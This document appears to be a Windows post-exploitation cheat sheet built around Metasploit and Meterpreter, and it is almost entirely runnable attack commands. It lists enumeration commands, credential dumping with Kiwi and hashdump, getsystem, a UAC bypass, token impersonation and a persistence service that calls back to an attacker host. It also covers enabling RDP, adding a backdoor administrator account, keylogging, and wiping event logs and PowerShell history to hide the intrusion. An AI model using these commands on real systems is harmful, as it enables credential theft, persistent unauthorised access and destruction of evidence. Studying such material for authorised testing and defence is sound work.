Windows Post-Exploitation
System Enumeration
| Command | Description |
|---|---|
sysinfo | OS, hostname, architecture (Meterpreter). |
getuid | Current user (Meterpreter). |
getpid | Current process ID. |
ps | List running processes. |
migrate <PID> | Migrate to another process for stability. |
ipconfig | Network configuration. |
arp | ARP table - discover local network hosts. |
From Shell (cmd/PowerShell)
| Command | Description |
|---|---|
whoami | Current user. |
whoami /priv | Current user privileges. |
whoami /groups | Current user group memberships. |
systeminfo | OS version, patches, network config, domain. |
net user | List local users. |
net user <username> | Details for a specific user. |
net localgroup | List all local groups. |
net localgroup administrators | Members of the Administrators group. |
ipconfig /all | Full network config including DNS. |
arp -a | ARP table. |
netstat -ano | Active connections with PIDs. |
tasklist | Running processes. |
sc query | List all services. |
wmic os get Caption,Version,BuildNumber | OS version details. |
Credential Dumping
# Meterpreter - Kiwi extension
load kiwi
creds_all # All credentials at once
lsa_dump_sam # Local account NTLM hashes
lsa_dump_secrets # LSA secrets (DefaultPassword, service accounts)# MSF post module
use post/windows/gather/hashdump
set SESSION <id>
run# Search for passwords in config files
use post/windows/gather/credentials/credential_collector
set SESSION <id>
run# Search unattend.xml and sysprep files from shell
dir /s /b C:\*unattend*.xml 2>nul
dir /s /b C:\*sysprep*.xml 2>nul
dir /s /b C:\*password*.txt 2>nulPrivilege Escalation
getsystem
meterpreter > getsystem
# Tries: named pipe impersonation, token duplication, etc.UAC Bypass
use exploit/windows/local/bypassuac_injection
set SESSION <id>
set TARGET Windows\ x64
runToken Impersonation
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
meterpreter > rev2self # Revert to original tokenPersistence
Service-based Persistence
use exploit/windows/local/persistence_service
set SESSION <id>
set LHOST <kali_IP>
set LPORT <port>
run
# Save the RC cleanup file path shown in outputEnable RDP for Persistent Access
# From Meterpreter shell
run post/windows/manage/enable_rdp
# or manually:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allowAdd a Local Admin User
net user hacker Password123! /add
net localgroup administrators hacker /add
net localgroup "Remote Desktop Users" hacker /addKeylogging
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stopClearing Tracks
# Clear Windows Event Logs (Meterpreter)
clearev
# From cmd
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Clear PowerShell history
del %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txtPost-Exploitation MSF Modules
| Module | Description |
|---|---|
post/windows/gather/enum_logged_on_users | List logged-on users. |
post/windows/gather/enum_shares | Enumerate network shares. |
post/windows/gather/enum_applications | Installed applications. |
post/windows/gather/credentials/credential_collector | Harvest stored credentials. |
post/multi/recon/local_exploit_suggester | Suggest local privilege escalation exploits. |
post/windows/manage/enable_rdp | Enable RDP. |
post/windows/manage/persistence | Registry-based persistence. |